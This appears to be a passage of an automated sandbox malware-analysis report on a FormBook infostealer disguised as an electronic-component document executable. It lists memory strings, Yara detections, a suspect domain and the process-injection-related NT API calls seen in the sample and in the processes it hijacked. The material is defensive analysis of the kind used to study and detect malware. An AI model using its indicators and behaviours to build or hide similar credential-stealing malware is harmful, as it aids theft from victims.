Source: cvSKtqilyhlQ.exe, 00000008.00000002.3525202420.0000000002C2A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rpa.asia/5blw/
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: bitsadmin.exe, 00000007.00000003.2454838198.0000000007847000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: bitsadmin.exe, 00000007.00000002.3526173862.00000000041CE000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3528139415.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000002.3525704940.0000000003C4E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0042C623 NtClose,	2_2_0042C623
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040AC5E NtAllocateVirtualMemory,	2_2_0040AC5E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040AC3D NtAllocateVirtualMemory,	2_2_0040AC3D
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742B60 NtClose,LdrInitializeThunk,	2_2_01742B60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01742DF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01742C70
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017435C0 NtCreateMutant,LdrInitializeThunk,	2_2_017435C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01744340 NtSetContextThread,	2_2_01744340
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01744650 NtSuspendThread,	2_2_01744650
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742BF0 NtAllocateVirtualMemory,	2_2_01742BF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742BE0 NtQueryValueKey,	2_2_01742BE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742BA0 NtEnumerateValueKey,	2_2_01742BA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742B80 NtQueryInformationFile,	2_2_01742B80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742AF0 NtWriteFile,	2_2_01742AF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742AD0 NtReadFile,	2_2_01742AD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742AB0 NtWaitForSingleObject,	2_2_01742AB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742D30 NtUnmapViewOfSection,	2_2_01742D30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742D10 NtMapViewOfSection,	2_2_01742D10
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742D00 NtSetInformationFile,	2_2_01742D00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742DD0 NtDelayExecution,	2_2_01742DD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742DB0 NtEnumerateKey,	2_2_01742DB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742C60 NtCreateKey,	2_2_01742C60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742C00 NtQueryInformationProcess,	2_2_01742C00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742CF0 NtOpenProcess,	2_2_01742CF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742CC0 NtQueryVirtualMemory,	2_2_01742CC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742CA0 NtQueryInformationToken,	2_2_01742CA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742F60 NtCreateProcessEx,	2_2_01742F60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742F30 NtCreateSection,	2_2_01742F30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742FE0 NtCreateFile,	2_2_01742FE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742FB0 NtResumeThread,	2_2_01742FB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742FA0 NtQuerySection,	2_2_01742FA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742F90 NtProtectVirtualMemory,	2_2_01742F90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742E30 NtWriteVirtualMemory,	2_2_01742E30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742EE0 NtQueueApcThread,	2_2_01742EE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742EA0 NtAdjustPrivilegesToken,	2_2_01742EA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742E80 NtReadVirtualMemory,	2_2_01742E80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743010 NtOpenDirectoryObject,	2_2_01743010
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743090 NtSetValueKey,	2_2_01743090
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017439B0 NtGetContextThread,	2_2_017439B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743D70 NtOpenThread,	2_2_01743D70
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743D10 NtOpenProcessToken,	2_2_01743D10
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03054340 NtSetContextThread,LdrInitializeThunk,	7_2_03054340
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03054650 NtSuspendThread,LdrInitializeThunk,	7_2_03054650
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052B60 NtClose,LdrInitializeThunk,	7_2_03052B60
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_03052BA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_03052BE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03052BF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052AD0 NtReadFile,LdrInitializeThunk,	7_2_03052AD0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052AF0 NtWriteFile,LdrInitializeThunk,	7_2_03052AF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052F30 NtCreateSection,LdrInitializeThunk,	7_2_03052F30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052FB0 NtResumeThread,LdrInitializeThunk,	7_2_03052FB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052FE0 NtCreateFile,LdrInitializeThunk,	7_2_03052FE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_03052E80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_03052EE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03052D10
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_03052D30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03052DD0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03052DF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052C60 NtCreateKey,LdrInitializeThunk,	7_2_03052C60
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03052C70
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03052CA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030535C0 NtCreateMutant,LdrInitializeThunk,	7_2_030535C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030539B0 NtGetContextThread,LdrInitializeThunk,	7_2_030539B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052B80 NtQueryInformationFile,	7_2_03052B80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052AB0 NtWaitForSingleObject,	7_2_03052AB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052F60 NtCreateProcessEx,	7_2_03052F60
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052F90 NtProtectVirtualMemory,	7_2_03052F90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052FA0 NtQuerySection,	7_2_03052FA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052E30 NtWriteVirtualMemory,	7_2_03052E30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052EA0 NtAdjustPrivilegesToken,	7_2_03052EA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052D00 NtSetInformationFile,	7_2_03052D00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052DB0 NtEnumerateKey,	7_2_03052DB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052C00 NtQueryInformationProcess,	7_2_03052C00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052CC0 NtQueryVirtualMemory,	7_2_03052CC0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052CF0 NtOpenProcess,	7_2_03052CF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053010 NtOpenDirectoryObject,	7_2_03053010
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053090 NtSetValueKey,	7_2_03053090
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053D10 NtOpenProcessToken,	7_2_03053D10
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053D70 NtOpenThread,	7_2_03053D70
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C8F70 NtCreateFile,	7_2_006C8F70
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C90E0 NtReadFile,	7_2_006C90E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C91D0 NtDeleteFile,	7_2_006C91D0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C9270 NtClose,	7_2_006C9270
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C93D0 NtAllocateVirtualMemory,	7_2_006C93D0

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01332500	0_2_01332500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01330870	0_2_01330870
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01331330	0_2_01331330
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01331AD8	0_2_01331AD8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013342B9	0_2_013342B9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013342C8	0_2_013342C8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335160	0_2_01335160
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01333347	0_2_01333347
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013312A0	0_2_013312A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013355B0	0_2_013355B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013355A0	0_2_013355A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335779	0_2_01335779
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335788	0_2_01335788
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013359F3	0_2_013359F3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335A00	0_2_01335A00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F549F	0_2_051F549F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F6498	0_2_051F6498
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F6488	0_2_051F6488
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F54B0	0_2_051F54B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051FB71F	0_2_051FB71F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051FB730	0_2_051FB730
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F7680	0_2_051F7680
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051FC0E3	0_2_051FC0E3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5FB0	0_2_051F5FB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5FC0	0_2_051F5FC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F0950	0_2_051F0950
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5A60	0_2_051F5A60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5A98	0_2_051F5A98
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_07B56984	0_2_07B56984
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_07B58DC9	0_2_07B58DC9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD4BE0	0_2_09CD4BE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD08E8	0_2_09CD08E8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD08F8	0_2_09CD08F8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD04C0	0_2_09CD04C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD04B0	0_2_09CD04B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B242A3A	0_2_0B242A3A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245A78	0_2_0B245A78
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B240AD0	0_2_0B240AD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B247990	0_2_0B247990
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B241C90	0_2_0B241C90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B2412D8	0_2_0B2412D8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B246018	0_2_0B246018
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B240040	0_2_0B240040
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B2470E0	0_2_0B2470E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245638	0_2_0B245638
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244BA8	0_2_0B244BA8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B246910	0_2_0B246910
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B243968	0_2_0B243968
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244811	0_2_0B244811
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B247F70	0_2_0B247F70
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24DE88	0_2_0B24DE88
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24ED90	0_2_0B24ED90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244DC8	0_2_0B244DC8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245CC0	0_2_0B245CC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24F1C8	0_2_0B24F1C8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245040	0_2_0B245040
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B241720	0_2_0B241720
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24F600	0_2_0B24F600
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244518	0_2_0B244518
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B246460	0_2_0B246460
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00418513	2_2_00418513
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00402910	2_2_00402910
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00403130	2_2_00403130
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0042EC53	2_2_0042EC53
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040FC7A	2_2_0040FC7A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004044E5	2_2_004044E5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040FC83	2_2_0040FC83
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004025D0	2_2_004025D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004166CC	2_2_004166CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040DEA3	2_2_0040DEA3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040FEA3	2_2_0040FEA3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0041670E	2_2_0041670E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00416713	2_2_00416713
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040DFE8	2_2_0040DFE8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040DFF3	2_2_0040DFF3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01798158	2_2_01798158
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AA118	2_2_017AA118
